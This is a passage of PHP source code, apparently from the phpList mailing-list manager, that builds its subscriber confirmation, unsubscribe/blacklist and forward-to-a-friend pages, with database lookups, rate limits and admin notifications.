logEvent('Request for confirmation for invalid user ID: '.substr($_GET['uid'], 0, 150));
$html = 'Error: '.$GLOBALS['strUserNotFound'];
$info = $GLOBALS['strConfirmFailInfo'];
}
$res = '<title>'.$GLOBALS['strConfirmTitle'].'</title>';
$res .= $GLOBALS['pagedata']['header'];
$res .= '<h3>'.$info.'</h3>';
$res .= $html;
$res .= '<p>'.$GLOBALS['PoweredBy'].'</p>';
$res .= $GLOBALS['pagedata']['footer'];
return $res;
}
/* unfinished
function subscribePage2($id)
{
list($attributes,$attributedata) = PageAttributes($GLOBALS['pagedata']);
$selected_lists = explode(',',$GLOBALS['pagedata']["lists"]);
$html = '<title>'.$GLOBALS["strSubscribeTitle"].'</title>';
$html .= '<link rel="stylesheet" type="text/css" href="styles/minimal.css" media="screen"/>';
$html .= '</head><body>';
$html .= '<div id="phplistform">';
$html .= formStart();
$html .= '<fieldset class="phplist"><legend>'.strip_tags($GLOBALS['pagedata']['intro']).'</legend>';
$html .= ListAttributes2011($attributes,$attributedata,$GLOBALS['pagedata']["htmlchoice"],0,$GLOBALS['pagedata']['emaildoubleentry']);
$html .= ListAvailableLists("",$GLOBALS['pagedata']["lists"]);
if (empty($GLOBALS['pagedata']['button'])) {
$GLOBALS['pagedata']['button'] = $GLOBALS['strSubmit'];
}
if (USE_SPAM_BLOCK) {
$html .= '<div style="display:none"><input type="text" name="VerificationCodeX" value="" size="20"></div>';
}
$html .= '<button type="submit" name="subscribe">'.$GLOBALS['pagedata']["button"].'</button>
</form>
<p><a href="'.getConfig("unsubscribeurl").'&id='.$id.'">'.$GLOBALS["strUnsubscribe"].'</a></p>
'.$GLOBALS["PoweredBy"];
$html .= '</div>';## id=phplistform
return $html;
}
*/
function unsubscribePage($id)
{
global $tables;
$email = '';
$userid = 0;
$msg = '';
//# for unsubscribe, don't validate host
$GLOBALS['check_for_host'] = 0;
$res = '<title>'.$GLOBALS['strUnsubscribeTitle'].'</title>'."\n";
$res .= $GLOBALS['pagedata']['header'];
if (isset($_GET['uid'])) {
$userdata = Sql_Fetch_Array_Query(sprintf('select email,id,blacklisted from %s where uniqid = "%s"',
$tables['user'], sql_escape($_GET['uid'])));
$email = $userdata['email'];
$displayEmail = obfuscateEmailAddress($userdata['email']);
$userid = $userdata['id'];
$isBlackListed = $userdata['blacklisted'] != '0';
$blacklistRequest = false;
} else {
if (isset($_REQUEST['email'])) {
$email = $_REQUEST['email'];
$displayEmail = obfuscateEmailAddress($email);
}
if (!validateEmail($email)) {
$email = '';
}
//0013076: Blacklisting posibility for unknown users
// Set flag for blacklisting
$blacklistRequest = $_GET['p'] == 'blacklist' || $_GET['p'] == 'donotsend';
// only proceed when user has confirm the form
if ($blacklistRequest && is_email($email)) {
$_POST['unsubscribe'] = 1;
$_POST['unsubscribereason'] = s('Forwarded receiver requested blacklist');
}
}
if (UNSUBSCRIBE_JUMPOFF || !empty($_GET['jo'])) {
$_POST['unsubscribe'] = 1;
$_REQUEST['email'] = $email;
if (!empty($_GET['jo'])) {
$blacklistRequest = true;
$_POST['unsubscribereason'] = s('"Jump off" used by subscriber, reason not requested');
} else {
$_POST['unsubscribereason'] = s('"Jump off" set, reason not requested');
}
}
foreach ($GLOBALS['plugins'] as $pluginname => $plugin) {
// print $pluginname.'<br/>';
if ($plugin->unsubscribePage($email)) {
return;
}
}
if (!empty($email) && isset($_POST['unsubscribe']) &&
isset($_REQUEST['email']) && isset($_POST['unsubscribereason'])
) {
//# all conditions met, do the unsubscribe
//0013076: Blacklisting posibility for unknown users
// It would be better to do this above, where the email is set for the other cases.
// But to prevent vulnerabilities let's keep it here for now. [bas]
if (!$blacklistRequest) {
$query = Sql_Fetch_Row_Query(sprintf('select id,email,blacklisted from %s where email = "%s"',
$tables['user'], sql_escape($email)));
$userid = $query[0];
$email = $query[1];
$isBlackListed = !empty($query[2]);
}
if (!$userid) {
//0013076: Blacklisting posibility for unknown users
if ($blacklistRequest && !empty($email)) {
addUserToBlacklist($email, $_POST['unsubscribereason']);
addSubscriberStatistics('blacklist', 1);
$res .= '<h3>'.$GLOBALS['strUnsubscribedNoConfirm'].'</h3>';
} else {
$res .= $GLOBALS['strNoListsFound']; //'Error: '.$GLOBALS["strUserNotFound"];
logEvent('Request to unsubscribe non-existent user: '.substr($email, 0, 150));
}
} else {
$subscriptions = array();
$listsreq = Sql_Query(sprintf('select listid from %s where userid = %d', $GLOBALS['tables']['listuser'],
$userid));
while ($row = Sql_Fetch_Row($listsreq)) {
array_push($subscriptions, $row[0]);
}
//# 17753 - do not actually remove the list-membership when unsubscribing
// $result = Sql_query(sprintf('delete from %s where userid = %d',$tables["listuser"],$userid));
$lists = ' * '.$GLOBALS['strAllMailinglists']."\n";
if (empty($isBlackListed)) { // only process when not already marked as blacklisted
// add user to blacklist
addUserToBlacklist($email, nl2br(strip_tags($_POST['unsubscribereason'])));
$unsubscribemessage = str_replace('[LISTS]', $lists, getUserConfig("unsubscribemessage:$id", $userid));
if (UNSUBSCRIBE_CONFIRMATION) {
sendMail($email, getUserConfig("unsubscribesubject:$id"), stripslashes($unsubscribemessage),
system_messageheaders($email), '', true);
}
$reason = $_POST['unsubscribereason'] ? "Reason given:\n".stripslashes($_POST['unsubscribereason']) : 'No Reason given';
sendAdminCopy('List unsubscription', $email." has unsubscribed\n$reason", $subscriptions);
addSubscriberStatistics('unsubscription', 1);
}
}
if ($userid) {
if (UNSUBSCRIBE_CONFIRMATION) {
$res .= '<h3>' . $GLOBALS['strUnsubscribeDone'] . '</h3>';
} else {
$res .= '<h3>' . $GLOBALS['strUnsubscribedNoConfirm'] . '</h3>';
}
}
//0013076: Blacklisting posibility for unknown users
//if ($blacklistRequest) {
//$res .= '<h3>'.$GLOBALS["strYouAreBlacklisted"] ."</h3>";
//}
$res .= $GLOBALS['PoweredBy'].'</p>';
$res .= $GLOBALS['pagedata']['footer'];
return $res;
} elseif (isset($_POST['unsubscribe']) && !is_email($email) && !empty($email)) {
$msg = '<span class="error">'.$GLOBALS['strEnterEmail'].'</span><br>';
}
$res .= '<h3>'.$GLOBALS['strUnsubscribeInfo'].'</h3>'.
$msg.'<form method="post" action=""><input type="hidden" name="p" value="unsubscribe" />';
if (empty($displayEmail) && !isset($_POST['email']) || empty($email)) {
$res .= '<p>'.$GLOBALS['strEnterEmail'].': <input type="text" name="email" value="'.$email.'" size="40" /></p>';
} else {
$res .= '<p><input type="hidden" name="email" value="'.$email.'" />'.$GLOBALS['strEmail'].': '.$displayEmail.'</p>';
}
if (!$email) {
$res .= '<input type="submit" name="unsubscribe" value="'.$GLOBALS['strContinue'].'"></form>';
$res .= $GLOBALS['PoweredBy'];
$res .= $GLOBALS['pagedata']['footer'];
return $res;
}
$current = Sql_Fetch_Array_query(sprintf('select list.id as listid,user.uniqid as userhash, user.password as password
from %s as list,%s as listuser,%s as user where list.id = listuser.listid and user.id = listuser.userid and user.email = "%s"',
$tables['list'], $tables['listuser'], $tables['user'], sql_escape($email)));
$some = $current['listid'];
if (ASKFORPASSWORD && !empty($user['password'])) {
// it is safe to link to the preferences page, because it will still ask for
// a password
$hash = $current['userhash'];
} elseif (isset($_GET['uid']) && $_GET['uid'] == $current['userhash']) {
// they got to this page from a link in an email
$hash = $current['userhash'];
} else {
$hash = '';
}
$finaltext = $GLOBALS['strUnsubscribeFinalInfo'];
$pref_url = getConfig('preferencesurl');
$sep = strpos($pref_url, '?') !== false ? '&' : '?';
$finaltext = str_ireplace('[preferencesurl]', $pref_url.$sep.'uid='.$hash, $finaltext);
if (!$some) {
//0013076: Blacklisting posibility for unknown users
if (!$blacklistRequest) {
$res .= '<b>'.$GLOBALS['strNoListsFound'].'</b></ul>';
}
$res .= '<p><input type=submit value="'.$GLOBALS['strUnsubscribe'].'">';
} else {
if ($blacklistRequest) {
$res .= $GLOBALS['strExplainBlacklist'];
} elseif (!UNSUBSCRIBE_JUMPOFF) {
list($r, $c) = explode(',', getConfig('textarea_dimensions'));
if (!$r) {
$r = 5;
}
if (!$c) {
$c = 65;
}
$res .= $GLOBALS['strUnsubscribeRequestForReason'];
$res .= sprintf('<br/><textarea name="unsubscribereason" cols="%d" rows="%d" wrap="virtual"></textarea>',
$c, $r).$finaltext;
}
$res .= '<p><input type=submit name="unsubscribe" value="'.$GLOBALS['strUnsubscribe'].'"></p>';
}
$res .= '</form>';
$res .= '<p>'.$GLOBALS['PoweredBy'].'</p>';
$res .= $GLOBALS['pagedata']['footer'];
return $res;
}
//#######################################
if (!function_exists('htmlspecialchars_decode')) {
function htmlspecialchars_decode($string, $quote_style = ENT_COMPAT)
{
return strtr($string, array_flip(get_html_translation_table(HTML_SPECIALCHARS, $quote_style)));
}
}
function forwardPage($id)
{
global $tables;
$ok = true;
$subtitle = '';
$info = '';
$html = '';
$form = '';
$personalNote = '';
//# Check requirements
// message
$mid = 0;
if (isset($_REQUEST['mid'])) {
$mid = sprintf('%d', $_REQUEST['mid']);
$messagedata = loadMessageData($mid);
$mid = $messagedata['id'];
if ($mid) {
$subtitle = $GLOBALS['strForwardSubtitle'].' '.stripslashes($messagedata['subject']);
}
} //mid set
// user
if (!isset($_REQUEST['uid']) || !$_REQUEST['uid']) {
FileNotFound();
}
//# get userdata
$req = Sql_Query(sprintf('select * from %s where uniqid = "%s"', $tables['user'], sql_escape($_REQUEST['uid'])));
$userdata = Sql_Fetch_Array($req);
//# verify that this subscriber actually received this message to forward, otherwise they're not allowed
$allowed = Sql_Fetch_Row_Query(sprintf('select userid from %s where userid = %d and messageid = %d',
$GLOBALS['tables']['usermessage'], $userdata['id'], $mid));
if (empty($userdata['id']) || $allowed[0] != $userdata['id']) {
//# when sending a test email as an admin, the entry isn't there yet
if (empty($_SESSION['adminloggedin']) || $_SESSION['adminloggedin'] != getClientIP()) {
FileNotFound('<br/><i>'.$GLOBALS['I18N']->get('When testing the phpList forward functionality, you need to be logged in as an administrator.').'</i><br/>');
}
}
$firstpage = 1; //# is this the initial page or a followup
// forward addresses
$forwardemail = '';
if (isset($_REQUEST['email']) && !empty($_REQUEST['email'])) {
$firstpage = 0;
$forwardPeriodCount = Sql_Fetch_Array_Query(sprintf('select count(user) from %s where date_add(time,interval %s) >= now() and user = %d and status ="sent" ',
$tables['user_message_forward'], FORWARD_EMAIL_PERIOD, $userdata['id']));
$forwardemail = stripslashes($_REQUEST['email']);
$emails = explode("\n", $forwardemail);
$emails = trimArray($emails);
$forwardemail = implode("\n", $emails);
//0011860: forward to friend, multiple emails
$emailCount = $forwardPeriodCount[0];
foreach ($emails as $index => $email) {
$emails[$index] = trim($email);
if (is_email($email)) {
++$emailCount;
} else {
$info .= sprintf('<br />'.$GLOBALS['strForwardInvalidEmail'], $email);
$ok = false;
}
}
if ($emailCount > FORWARD_EMAIL_COUNT) {
$info .= '<br />'.$GLOBALS['strForwardCountReached'];
$ok = false;
}
} else {
$ok = false;
}
// subscriber name
if (!empty($_REQUEST['subscriberName'])) {
$subscriberName = htmlspecialchars_decode(stripslashes($_REQUEST['subscriberName']));
$userdata['subscriberName'] = $subscriberName;
} else {
$subscriberName = '';
$ok = false;
}
//0011996: forward to friend - personal message
// text cannot be longer than max, to prevent very long text with only linefeeds total cannot be longer than twice max
if (FORWARD_PERSONAL_NOTE_SIZE && isset($_REQUEST['personalNote'])) {
if (strlen(strip_newlines($_REQUEST['personalNote'])) > FORWARD_PERSONAL_NOTE_SIZE || strlen($_REQUEST['personalNote']) > FORWARD_PERSONAL_NOTE_SIZE * 2) {
$info .= '<BR />'.$GLOBALS['strForwardNoteLimitReached'];
$ok = false;
}
$personalNote = strip_tags(htmlspecialchars_decode(stripslashes($_REQUEST['personalNote'])));
$userdata['personalNote'] = $personalNote;
}
if ($userdata['id'] && $mid) {
if ($ok && count($emails)) { //# All is well, send it
require_once 'admin/sendemaillib.php';
//0013845 Lead Ref Scheme
if (FORWARD_FRIEND_COUNT_ATTRIBUTE) {
$iCountFriends = FORWARD_FRIEND_COUNT_ATTRIBUTE;
} else {
$iCountFriends = 0;
}
if ($iCountFriends) {
$nFriends = intval(UserAttributeValue($userdata['id'], $iCountFriends));
}
//# remember the lists for this message in order to notify only those admins
//# that own them
$messagelists = array();
$messagelistsreq = Sql_Query(sprintf('select listid from %s where messageid = %d',
$GLOBALS['tables']['listmessage'], $mid));
while ($row = Sql_Fetch_Row($messagelistsreq)) {
array_push($messagelists, $row[0]);
}
foreach ($emails as $index => $email) {
//0011860: forward to friend, multiple emails
$done = Sql_Fetch_Array_Query(sprintf('select user,status,time from %s where forward = "%s" and message = %d',
$tables['user_message_forward'], $email, $mid));
$info .= '<br />'.$email.': ';
if ($done['status'] === 'sent') {
$info .= $GLOBALS['strForwardAlreadyDone'];
} elseif (isBlackListed($email)) {
$info .= $GLOBALS['strForwardBlacklistedEmail'];
} else {
if (!TEST) {
// forward the message
// sendEmail will take care of blacklisting
//## CHECK $email vs $forwardemail
if (sendEmail($mid, $email, 'forwarded', $userdata['htmlemail'], array(), $userdata)) {
$info .= $GLOBALS['strForwardSuccessInfo'];
sendAdminCopy(s('Message Forwarded'),
s('%s has forwarded message %d to %s', $userdata['email'], $mid, $email),
$messagelists);
Sql_Query(sprintf('insert into %s (user,message,forward,status)
values(%d,%d,"%s","sent")',
$tables['user_message_forward'], $userdata['id'], $mid, $email));
if ($iCountFriends) {
++$nFriends;
}
} else {
$info .= $GLOBALS['strForwardFailInfo'];
sendAdminCopy(s('Message Forwarded'),
s('%s tried forwarding message %d to %s but failed', $userdata['email'], $mid, $email),
$messagelists);
Sql_Query(sprintf('insert into %s (user,message,forward,status)
values(%d,%d,"%s","failed")',
$tables['user_message_forward'], $userdata['id'], $mid, $email));
$ok = false;
}
}
}
} // foreach friend
if ($iCountFriends) {
saveUserAttribute($userdata['id'], $iCountFriends,
array('name' => FORWARD_FRIEND_COUNT_ATTRIBUTE, 'value' => $nFriends));
}
} //ok & emails
} else { // no valid sender
logEvent(s('Forward request from invalid user ID: %s', substr($_REQUEST['uid'], 0, 150)));
$info .= '<BR />'.$GLOBALS['strForwardFailInfo'];
$ok = false;
}
/*
$data = PageData($id);
if (isset($data['language_file']) && is_file(dirname(__FILE__).'/texts/'.basename($data['language_file']))) {
@include dirname(__FILE__).'/texts/'.basename($data['language_file']);
}
*/
//# BAS Multiple Forward
//# build response page
$form = '<form method="post" action="">';
$form .= sprintf('<input type=hidden name="mid" value="%d">', $mid);
$form .= sprintf('<input type=hidden name="id" value="%d">', $id);
$form .= sprintf('<input type=hidden name="uid" value="%s">', $userdata['uniqid']);
$form .= sprintf('<input type=hidden name="p" value="forward">');
if (!$ok) {
//0011860: forward to friend, multiple emails
if (FORWARD_EMAIL_COUNT == 1) {
$format = <<<'END'
<div class="required"><label for="email">%s</label></div>
<input type=text name="email" id="email" value="%s" size=50 class="attributeinput">
END;
$form .= sprintf($format, $GLOBALS['strForwardEnterEmail'], $forwardemail);
} else {
$labelText = sprintf($GLOBALS['strForwardEnterEmails'], FORWARD_EMAIL_COUNT);
$format = <<<'END'
<div class="required"><label for="email">%s</label></div>
<textarea name="email" id="email" rows="%d" cols="50" class="attributeinput">%s</textarea>
END;
$form .= sprintf($format, $labelText, min(10, FORWARD_EMAIL_COUNT), $forwardemail);
}
$format = <<<'END'
<div class="required"><label for="subscriberName">%s</label></div>
<input type=text name="subscriberName" id="subscriberName" value="%s" size=50 class="attributeinput">
END;
$form .= sprintf($format, $GLOBALS['strForwardForwardingName'], htmlspecialchars($subscriberName));
//0011996: forward to friend - personal message
if (FORWARD_PERSONAL_NOTE_SIZE) {
$labelText= sprintf($GLOBALS['strForwardPersonalNote'], FORWARD_PERSONAL_NOTE_SIZE);
$cols = 50;
$rows = min(10, ceil(FORWARD_PERSONAL_NOTE_SIZE / 40));
$format = <<<'END'
<div><label for="personalNote">%s</div>
<textarea type="text" name="personalNote" id="personalNote" rows="%d" cols="%d" class="attributeinput">%s</textarea>
</label>
END;
$form .= sprintf($format, $labelText, $rows, $cols, $personalNote);
}
$form .= sprintf('<br /><input type="submit" value="%s"></form>', $GLOBALS['strContinue']);
}
//## END BAS
//## Michiel, remote response page
$remote_content = '';
if (preg_match("/\[URL:([^\s]+)\]/i", $messagedata['message'], $regs)) {
if (isset($regs[1]) && strlen($regs[1])) {
$url = $regs[1];
if (!preg_match('/^http/i', $url)) {
$url = 'http://'.$url;
}
$remote_content = fetchUrl($url);
}
}
if (!empty($remote_content) && preg_match('/\[FORWARDFORM\]/', $remote_content, $regs)) {
if ($firstpage) {
//# this is the initial page, not a follow up one.
$remote_content = str_replace($regs[0], $info.$form, $remote_content);
} else {
$remote_content = str_replace($regs[0], $info, $remote_content);
}
$res = $remote_content;
} else {
$res = '<title>'.$GLOBALS['strForwardTitle'].'</title>';
$res .= $GLOBALS['pagedata']['header'];
$res .= '<h3>'.$subtitle.'</h3>';
if ($ok) {
$res .= '<h4>'.$info.'</h4>';
} elseif (!empty($info)) {
$res .= '<div class="error missing">'.$info.'</div>';
}
$res .= $form;
$res .= '<p>'.$GLOBALS['PoweredBy'].'</p>';
$res .= $GLOBALS['pagedata']['footer'];
}
//## END MICHIEL
return $res;
}